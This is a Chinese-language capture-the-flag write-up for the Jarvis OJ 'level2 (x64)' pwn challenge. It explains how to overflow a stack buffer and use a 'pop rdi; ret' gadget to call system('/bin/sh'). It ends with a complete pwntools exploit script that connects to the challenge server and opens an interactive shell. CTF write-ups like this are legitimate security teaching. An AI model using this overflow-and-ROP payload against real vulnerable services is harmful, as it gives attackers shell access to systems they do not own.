(Jarvis Oj)(Pwn) level2(x64)

(Jarvis Oj)(Pwn) level2(x64)

首先用checksec查一下保护，和level2一样。

反汇编，程序和32位的程序几乎一致。找到溢出点。

那么溢出思路也和32位的差不多，唯一不同的是，64位程序在调用system函数时，参数的传递方式和32位不一样，32位是通过栈传参，而64位通过edi寄存器传参，所以这时我们的思路变成如何覆盖edi的值，通过基本rop就可以做到，利用程序自己的带有pop edi/rdi;ret语句达到给edi赋值的效果。pop edi语句是将当前的栈顶元素传递给edi，在执行pop语句时，只要保证栈顶元素是”/bin/sh”的地址，并将返回地址设置为system。示意图如下：

通过ropgadget去找pop edi;ret的地址。

最后写得脚本。

  1 from pwn import *                                                                                                  
  2 conn=remote("pwn2.jarvisoj.com","9882")
  3 #conn=process("./level2x64")
  4 e=ELF("./level2x64")
  5 sys_addr=e.symbols['system']
  6 pad=0x80
  7 pop_rdi_addr=0x4006b3
  8 sh_addr=e.search("/bin/sh").next()
  9 payload="A"*pad+"BBBBBBBB"+p64(pop_rdi_addr)+p64(sh_addr)+p64(sys_addr)
 10 conn.sendline(payload)
 11 conn.interactive();